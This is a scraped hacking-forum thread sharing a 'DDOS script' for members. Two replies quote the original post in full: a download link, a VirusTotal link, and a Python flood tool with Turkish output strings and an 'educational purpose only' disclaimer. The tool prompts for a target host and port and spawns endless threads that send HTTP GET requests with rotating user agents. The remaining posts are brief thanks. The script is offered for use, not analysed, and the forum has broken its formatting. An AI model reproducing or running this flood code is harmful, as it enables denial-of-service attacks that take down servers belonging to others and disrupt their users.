Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 2544

DDOS SCRIPT FOR C.TO Members

by ayre123 - 03 August, 2020 - 02:48 PM
This post is by a banned member (HackEnabled) - Unhide
This post is by a banned member (zigolak) - Unhide
zigolak  
Registered
8
Posts
0
Threads
2 Years of service
#18
hope this one works
This post is by a banned member (dacloud) - Unhide
This post is by a banned member (linux21123) - Unhide
73
Posts
1
Threads
3 Years of service
#20
(03 August, 2020 - 02:48 PM)ayre123 Wrote: Show More
yy[Image: 68747470733a2f2f692e696d6775722e636f6d2f...png.567605]https://imgur.com/a/H7G0CF5
download file :
virustotal:https://www.virustotal.com/gui/url/2875a.../detection
Code:
 

 
[code]
import os import sys import socket import random import threading
Code:
 
[code]
""" Educational purpose only I'm not responsible for your actions ----------------------------------------------------- Created By: Bladehq
 
Code:
 
 
Code:
if sys.platform == "linux" or sys.platform == "linux2": os.system("clear") elif sys.platform == "win32": os.system("cls") elif sys.platform == "darwin": os.system("clear") else: print("Bu Ne Orospu Evladi")
 
Code:
user_server = raw_input("\033[1;32m [BuTCP] IPv4 Veya DNS: \033[1;m") user_port = input("\033[1;32m [BuTCP] Port: \033[1;m") agent = [] count = 0
 
Code:
 
 
Code:
 
 
Code:
def user_agent(): global agent agent.append("Mozilla/5.0 (Linux; Android 7.0; SM-G892A BuVersion/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36") agent.append("Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 ( like Gecko)") agent.append("Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) 4.0 Mobile Safari/533.1") agent.append("Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)") agent.append("Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)") agent.append("Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0;") return agent
 
Code:
class Socks(threading.Thread): def run(self): global user_server, user_port, count while True: try: soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) packet = "GET / HTTP/1.1\n Host: " + user_server + "\n\n User-Agent:" + random.choice(user_agent()) soc.connect((user_server, int(user_port))) soc.sendto(packet, (user_server, int(user_port))) count += 1 print ("\033[1;32m [BuTCP] Saldiri Girisi \033[1;m {0}".format(count)) except KeyboardInterrupt: exit("\033[1;32m [BuTCP] Saldiri Durduruldu \033[1;m") break except socket.error: print ("\033[1;32m [BuTCP] Sunucu Tarafindan Engellendiniz. \033[1;32m") pass while True: try: th1 = Socks() th1.start() except KeyboardInterrupt: exit("\033[1;32m [BuTCP] Saldiri Durduruldu \033[1;m") break


[/code]
[/quote]

tyyt
This post is by a banned member (Almiighty99) - Unhide
213
Posts
4
Threads
1 Year of service
#21
(03 August, 2020 - 02:48 PM)ayre123 Wrote: Show More
[Image: 68747470733a2f2f692e696d6775722e636f6d2f...png.567605]https://imgur.com/a/H7G0CF5
download file :
virustotal:https://www.virustotal.com/gui/url/2875a.../detection
Code:
 

 
[code]
import os import sys import socket import random import threading
Code:
 
[code]
""" Educational purpose only I'm not responsible for your actions ----------------------------------------------------- Created By: Bladehq
 
Code:
 
 
Code:
if sys.platform == "linux" or sys.platform == "linux2": os.system("clear") elif sys.platform == "win32": os.system("cls") elif sys.platform == "darwin": os.system("clear") else: print("Bu Ne Orospu Evladi")
 
Code:
user_server = raw_input("\033[1;32m [BuTCP] IPv4 Veya DNS: \033[1;m") user_port = input("\033[1;32m [BuTCP] Port: \033[1;m") agent = [] count = 0
 
Code:
 
 
Code:
 
 
Code:
def user_agent(): global agent agent.append("Mozilla/5.0 (Linux; Android 7.0; SM-G892A BuVersion/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36") agent.append("Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 ( like Gecko)") agent.append("Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) 4.0 Mobile Safari/533.1") agent.append("Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)") agent.append("Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)") agent.append("Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0;") return agent
 
Code:
class Socks(threading.Thread): def run(self): global user_server, user_port, count while True: try: soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) packet = "GET / HTTP/1.1\n Host: " + user_server + "\n\n User-Agent:" + random.choice(user_agent()) soc.connect((user_server, int(user_port))) soc.sendto(packet, (user_server, int(user_port))) count += 1 print ("\033[1;32m [BuTCP] Saldiri Girisi \033[1;m {0}".format(count)) except KeyboardInterrupt: exit("\033[1;32m [BuTCP] Saldiri Durduruldu \033[1;m") break except socket.error: print ("\033[1;32m [BuTCP] Sunucu Tarafindan Engellendiniz. \033[1;32m") pass while True: try: th1 = Socks() th1.start() except KeyboardInterrupt: exit("\033[1;32m [BuTCP] Saldiri Durduruldu \033[1;m") break


[/code]
[/quote]
This post is by a banned member (vilelajr9) - Unhide
vilelajr9  
Registered
49
Posts
0
Threads
#22
tyy

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 4 Guest(s)